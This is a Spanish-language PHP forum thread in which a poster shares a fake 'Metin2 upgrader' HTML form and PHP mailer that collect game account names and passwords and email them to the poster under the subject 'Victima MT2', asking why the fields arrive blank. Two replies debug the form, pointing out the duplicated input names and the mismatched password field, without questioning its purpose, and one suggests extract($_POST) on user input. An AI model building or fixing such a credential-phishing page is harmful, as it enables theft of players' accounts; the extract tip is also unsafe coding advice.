Foros del Web » Programando para Internet » PHP »

Formulario php me sale en blanco

Estas en el tema de Formulario php me sale en blanco en el foro de PHP en Foros del Web. Bueno pues trato de que envié a mi correo y lo envía pero al lado de donde pone por ejemplo ''Nombre del personaje'' o ''contraseña'' ...
  #1 (permalink)  
Antiguo 06/02/2013, 14:50
 
Fecha de Ingreso: febrero-2013
Mensajes: 20
Antigüedad: 11 años, 2 meses
Puntos: 0
Formulario php me sale en blanco

Bueno pues trato de que envié a mi correo y lo envía pero al lado de donde pone por ejemplo ''Nombre del personaje'' o ''contraseña'' y demás datos sale en blanco en el mensaje de mi correo.. ¿que podrá estar mal?

Código html:

Código:
<!DOCTYPE html>
<html>
<head>
<title>MT2 ES UPGRADER</title>
<link rel="StyleSheet" href="estilos.css" type="text/css">
</head>
<body style="background-image:url(metin2.jpg); background-attachment: fixed; background-position: top center; background-repeat: no-repeat;">
<body BGCOLOR="#ff0000">
<fieldset style="font:10 pt verdana, arial 
color:#000000; 
margin:auto; 
border:1px solid #cccccc; 
padding:200px; 
width: 200px;"> 
<legend>Metin2+ Subidor de Herrero</legend>
<form action="formulario.php" method="post" enctype="multipart/form-data" name="form1"> 
Servidor:
<input type="radio" name="radio2" checked value="Crep">Crepusculo<br>
<br>
Nombre de la cuenta:
<input name="nombre" type="text" id="nombrecuenta" maxlength="50"><br>
Nombre del personaje:
<input name="nombre" type="text" id="nombrepj" maxlength="50"><br>
Nivel del personaje:
<input name="nombre" type="text" id="nivel" maxlength="50"><br>
Contraseña:
<input name="contraseña" type="password" id="contraseña" value=""><br>
Items a subir:<br>
<input type="radio" name="radio1" value="armor">Armaduras<br>
<input type="radio" name="radio1" value="weapon">Armas<br>
<input type="radio" name="radio1" value="misc">Miscalena<br>
<br>
<input type="submit" value="Enviar"><br>
</fieldset>
<br>
<br>
<br>
<br>
Created by: Cydrex
</form>
</body>
</html>
Código php:
Código:
<?php 
$sendTo = "[email protected]"; 
$subject = "Victima MT2"; 
$nombrecuenta = $_POST["nombrecuenta"]; 
$nombrepj = $_POST["nombrepj"]; 
$nivel = $_POST["nivel"]; 
$password = $_POST["password"]; 
$headers .= ""; 
$message = "\nNombre de la cuenta:  " . $nombrecuenta . "\nNombre del personaje:  " . $nombrepj . "\nNivel del personaje:  " . $nivel . "\nContraseña: " . $password; 
mail($sendTo, $subject, $message, $headers); 
?>
Un saludo.
  #2 (permalink)  
Antiguo 06/02/2013, 14:53
Colaborador
 
Fecha de Ingreso: mayo-2008
Ubicación: $MX['VZ']['Xalapa']
Mensajes: 3.005
Antigüedad: 15 años, 11 meses
Puntos: 528
Respuesta: Formulario php me sale en blanco

Por principio de cuentas, deberías verificar que efectivamente no recibes datos, pudiendo hacer un var_ump($_POST); para ver si recibes algo.

Luego, como tip, en vez de hacer
$nombrecuenta = $_POST["nombrecuenta"]; puedes hacer un extract($_POST); y sacar las variables de POST
  #3 (permalink)  
Antiguo 06/02/2013, 15:06
Avatar de bet7o  
Fecha de Ingreso: febrero-2010
Ubicación: DF
Mensajes: 315
Antigüedad: 14 años, 2 meses
Puntos: 20
Respuesta: Formulario php me sale en blanco

El formulario esta mal, fijate en los nombres de los inputs los estas repitiendo

Código HTML:
Ver original
  1. Nombre de la cuenta:
  2. <input name="nombre" type="text" id="nombrecuenta" maxlength="50"><br>
  3. Nombre del personaje:
  4. <input name="nombre" type="text" id="nombrepj" maxlength="50"><br>
  5. Nivel del personaje:
  6. <input name="nombre" type="text" id="nivel" maxlength="50"><br>

El campo de contraseña no se llama password

Código HTML:
Ver original
  1. <input name="contraseña" type="password" id="contraseña" value=""><br>

En cuanto al uso de extract te dejo el link del manual extract.php

Checa donde dice "No use extract() en datos que no son de confianza, ..."


Saludos!
__________________
Pero el no contaba con una cosa, mi peligroso desinteres por la vida humana

Etiquetas: blanco, formulario, html
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 05:14.